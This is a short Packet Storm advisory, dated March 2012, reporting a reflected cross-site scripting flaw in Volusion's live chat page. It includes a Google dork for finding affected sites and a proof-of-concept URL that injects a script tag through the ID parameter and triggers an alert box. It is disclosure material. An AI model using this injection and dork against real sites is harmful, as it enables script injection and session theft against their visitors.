Volusion Chat Cross Site Scripting

2012-03-15T00:00:00
ID PACKETSTORM:110811
Type packetstorm
Reporter Sony
Modified 2012-03-15T00:00:00

Description

                                        
                                            `# Exploit Title: Volusion Chat Cross Site Scripting  
# Date: 15.03.2012  
# Author: Sony  
# Software Link: http://www.volusion.com/  
# Google Dorks: inurl:livechat.aspx?ID= intext:volusion or intext:powered  
by volusion  
# Web Browser : Mozilla Firefox  
# Blog : http://st2tea.blogspot.com  
# PoC:  
http://st2tea.blogspot.com/2012/03/volusion-chat-cross-site-scripting.html  
..................................................................  
  
  
https://livechat03.volusion.com/livechat.aspx?ID=24342[our xss is  
here]&location=http%3A//www.volusion.com/&auto=0&cookieGuid=  
  
https://livechat03.volusion.com/livechat.aspx?ID=24342%22%22%3E%3Cscript%3Ealert%28%221%22%29%3C/script%3E&location=http%3A//www.volusion.com/&auto=0&cookieGuid=  
  
http://4.bp.blogspot.com/-CSpnn8fNIYY/T2EGeu_u41I/AAAAAAAAAvM/TcpwDTdCLUA/s1600/volusion.JPG  
  
..................................................................  
  
InSecurity.Ro  
  
Because we care, we're security aware!  
`